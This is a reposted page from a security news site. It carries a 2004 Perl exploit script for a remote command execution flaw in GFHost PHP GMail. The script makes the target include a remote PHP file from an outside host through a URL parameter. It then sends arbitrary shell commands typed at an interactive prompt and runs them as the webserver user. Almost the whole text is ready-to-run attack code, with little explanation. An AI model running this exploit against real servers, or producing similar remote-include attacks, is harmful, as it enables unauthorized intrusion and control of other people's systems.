首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GFHost PHP GMail Remote Command Execution Exploit
来源:www.zone-h.org 作者:SPABAM 发布时间:2004-11-25  

GFHost PHP GMail Remote Command Execution Exploit

##############################################
# GFHost explo
# Spawn bash style Shell with webserver uid
# Greetz SPAX, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
$U[1] = "/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=http://utenti.lycos.it/z00/xpl.gif&cmd=";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 1;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
$output = $results[$X];
if (defined $output){
if ($output =~/apache/){ $webserver = "apache" };
};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
}else{
print "\n\nOK";
};
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
$flag = "1";
$status = "vulnerable";
};
};
if ($flag eq "0") {
}else{
};
};
if ($status eq "not_vulnerable"){

};
};
sub choose {

my $choice="1";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

while ( <$connection> ) {
@results = <$connection>;
};
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
my $display;
if ($probe eq "string") {
my $X;
for ($X=0; $X<=10; $X++) {
$display = $results[$X];
if (defined $display){print "$display";};
};
}else{
foreach $display (@results){
print "$display";
};
};
};
sub exit{
print "\n\n\n ORP";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
GFHost PHP GMail
Command Execution Vulnerability by SPABAM 2004";
print "\n http://www.zone-h.org/advisories/read/id=4904
";
print "\n GFHost.pl Exploit v1.1";
print "\n \n note.. Script under DEVEL";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};
//milw0rm.com



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DMS POP3 Remote BufferOverflow
·Halo Broadcast Client Crash
·ProZilla <= 1.3.6 Format st
·WodFtpDLX Client ActiveX Contr
·Invision Power Board v2.0.0 -
·Winamp <= 5.06 'IN_CDDA.dll
·phpBB highlight parameter Proc
·MailEnable IMAP service Remote
·WeOnlyDo! COM Ftp DELUXE Activ
·php <= 4.3.7 and <= 5.0.
·CoffeeCup FTP Clients Remote B
·Mercury Mail 4.01 (Pegasus) IM
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved